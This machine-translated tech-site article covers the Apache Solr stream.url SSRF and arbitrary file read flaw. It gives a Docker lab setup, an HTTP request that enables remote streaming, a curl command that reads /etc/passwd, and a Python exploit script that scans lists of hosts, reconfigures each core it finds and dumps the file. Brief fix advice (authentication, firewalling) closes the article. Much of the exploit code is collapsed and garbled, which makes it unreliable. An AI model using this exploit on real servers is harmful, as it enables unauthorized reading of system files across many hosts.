Shulou(Shulou.com)05/31 Report--

This article mainly explains the "Apache-Solr arbitrary file read vulnerabilities how to fix", the article explained the content is simple and clear, easy to learn and understand, the following please follow the editor's ideas slowly in-depth, together to study and learn "Apache-Solr arbitrary file reading vulnerabilities how to fix it!"

Vulnerability description

Apache Solr is an open source search service developed in the Java language. Some functions of Apache Solr are not strictly filtered. When authentication is not enabled in Apache Solr, an attacker can directly construct a specific request to open a specific configuration, and eventually create a SSRF or file read vulnerability.

Vulnerability rating

Apache Solr stream.url SSRF and arbitrary file reading vulnerabilities are at risk

Affect the version

All versions of Apache Solr

Secure version

Officials will not fix it, and there is no secure version for the time being.

Reproduce the process environment to build docker search solrdocker pull solrdocker run-d-p 8983 solrdocker exec-it instance id / bin/bashcp-r server/solr/configsets/_default/conf / var/solr/data/test1

Reference: http://www.bubuko.com/infodetail-3118740.html

Loophole recurrence

First get the core

Take my_core test as an example

POST / solr/my_core/config HTTP/1.1Host: x.x.x.x:8983Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: closeContent-Length: 84 {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}}

Read a file

Curl "http://ip:8983/solr/my_core/debug/dump?param=ContentStreams"-F" stream.url= file:///etc/passwd"EXP coding coding: UTF-8import argparseimport asyncioimport jsonimport pathlibfrom typing import Tuplefrom urllib.parse import urlparseimport httpxclass URLAction (argparse.Action): def _ call__ (self, parser, namespace, values, option_string=None): if not urlparse (values): raise ValueError ("Not a valid url!") setattr (namespace, self.dest) Values) class FILEAction (argparse.Action): def _ call__ (self, parser, namespace, values, option_string=None): if not pathlib.Path (values). Exists (): raise ValueError ("File not exists!") setattr (namespace, self.dest, values) parser = argparse.ArgumentParser (description= "Solr Poc") parser.add_argument ("- host", type=str, action=URLAction, help= "target host uri") parser.add_argument ("- file", type=str, action=FILEAction Help= "target host file") parser.add_argument ("- conn", type=int, default=10, help= "asyncio max connetions") args = parser.parse_args () SEM = asyncio.Semaphore (args.conn) RESULT = {} async def check (host: str)-> Tuple [str, bool]: status = Falseasync with SEM:async with httpx.AsyncClient (base_url=host) as client:try:core_data = (await client.get ("/ solr/admin/cores?indexInfo=false&wt=json") Json () except httpx.ReadTimeout:print (f "{host} TimeOut!") status = "TimeOut" else:if (data_status: = core_data ["status"]): core = list (data_status.keys ()) [0] await client.post (f "/ solr/ {core} / config", json= {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}},) result_data = (await client.post (url=f "/ solr/ {core} / debug/dump?param=ContentStreams") Data= {"stream.url": "file:///etc/passwd"},)).json()if (streams: = result_data [" streams "]): print (streams [0] [" stream "]) status = Truefinally:RESULT [host] = statusreturn host, statusasync def loop (urls): await asyncio.gather (* list (map (check)) )) def main (): result_file = pathlib.Path ("solr_main.json") try:urls = set () if args.host:urls.add (args.host) if args.file:with pathlib.Path (args.file) .open ("r") as file:urls = urls.union ({url for line in file if urlparse ((url: = line.strip ())}) print (f "tasks: {len (urls)}") asyncio.run (loop (urls)) ) except KeyboardInterrupt:passfinally:with result_file.open ("w") as file:file.write (json.dumps (RESULT) Indent=4, ensure_ascii=True)) repair recommendation

1. Increase authentication / authorization

two。 It is forbidden to open Solr API and management UI directly to public networks. Set up a firewall to allow access only to trusted computers and people.

Thank you for your reading, the above is the content of "how to fix Apache-Solr arbitrary file reading vulnerabilities". After the study of this article, I believe you have a deeper understanding of how to fix Apache-Solr arbitrary file reading vulnerabilities, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.